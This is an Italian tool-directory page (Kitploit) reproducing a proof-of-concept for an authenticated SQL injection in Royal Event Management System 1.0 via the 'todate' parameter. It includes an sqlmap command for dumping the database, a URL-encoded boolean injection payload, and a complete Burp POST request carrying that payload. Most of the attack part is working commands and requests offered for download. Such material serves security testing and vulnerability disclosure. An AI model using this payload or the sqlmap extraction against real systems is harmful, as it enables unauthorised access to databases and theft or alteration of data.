Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Royal-Event-Management-System-todate-SQL-Injection-Authenticated — Exploit di SQL injection autenticato per Royal Event Management System 1.0 tramite il parametro 'todate', con payload proof-of-concept e integrazione SQLmap per l'estrazione del database. | Kitploit
Strumenti/GitHubGitHub/erengozaydin/royal-event-management-system-todate-sql-injection-authenticated
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHuberengozaydin/royal-event-management-system-todate-sql-injection-authenticated

Royal-Event-Management-System-todate-SQL-Injection-Authenticated

Exploit di SQL injection autenticato per Royal Event Management System 1.0 tramite il parametro 'todate', con payload proof-of-concept e integrazione SQLmap per l'estrazione del database.

Vedi Repository
14 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Royal Event Management System - SQL Injection tramite 'todate' (Autenticato)

  1. Descrizione:

Royal Event Management System 1.0 consente SQL Injection tramite il parametro 'todate' in /royal_event/btndates_report.php#?= Lo sfruttamento di questo problema potrebbe permettere a un attaccante di compromettere l'applicazione, accedere o modificare dati, o sfruttare vulnerabilità latenti nel database sottostante.

  1. Prova di concetto:

In Burpsuite intercettare la richiesta dalla pagina interessata con il parametro 'todate' e salvarla come poc.txt. Quindi eseguire SQLmap per estrarre i dati dal database:

sqlmap -r poc.txt --dbms=mysql

  1. Payload di esempio:

(basato su booleano)

-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns

  1. Richiesta Burpsuite:

POST /royal_event/btndates_report.php#?= HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 334
Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0
Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380
Referer: http://localhost/royal_event/btndates_report.php#?=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="todate"

-1' OR 1=1 OR 'ns'='ns
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="search"

3 --f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="fromdate" 01/01/2011 --f289a6438bcc45179bcd3eb7ddc555d0--





Scarica lo strumento